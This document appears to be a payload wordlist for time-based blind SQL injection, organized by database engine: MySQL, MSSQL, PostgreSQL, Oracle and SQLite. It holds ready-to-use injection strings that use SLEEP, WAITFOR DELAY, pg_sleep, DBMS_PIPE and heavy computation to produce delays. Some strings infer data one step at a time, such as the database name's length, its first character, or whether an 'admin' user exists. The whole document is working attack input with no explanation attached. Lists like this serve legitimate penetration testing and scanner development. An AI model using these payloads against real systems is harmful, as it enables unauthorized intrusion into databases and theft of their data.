# MySQL Time-Based
' AND SLEEP(5)--
' OR SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' AND IF(1=2, SLEEP(5), 0)--
' OR IF(1=1, SLEEP(5), 0)--
' AND BENCHMARK(5000000,MD5('test'))--
' OR BENCHMARK(5000000,MD5('test'))--
' AND IF(LENGTH(DATABASE())>5, SLEEP(5), 0)--
' AND IF(ASCII(SUBSTRING(DATABASE(),1,1))>64, SLEEP(5), 0)--
' AND IF(EXISTS(SELECT 1 FROM users WHERE username='admin'), SLEEP(5), 0)--
" AND SLEEP(5)--
1 AND SLEEP(5)--

# MSSQL Time-Based
'; WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '00:00:05'--
' WAITFOR DELAY '0:0:5'--
'; IF 1=1 WAITFOR DELAY '0:0:5'--
'; IF(1=1) WAITFOR DELAY '0:0:5'--

# PostgreSQL Time-Based
' AND pg_sleep(5)--
'; SELECT pg_sleep(5)--
' OR pg_sleep(5)--
' AND (SELECT pg_sleep(5))--
' || pg_sleep(5)--

# Oracle Time-Based
' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
' AND 1=(SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) ELSE 1 END FROM dual)--

# SQLite Time-Based
' AND (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))))--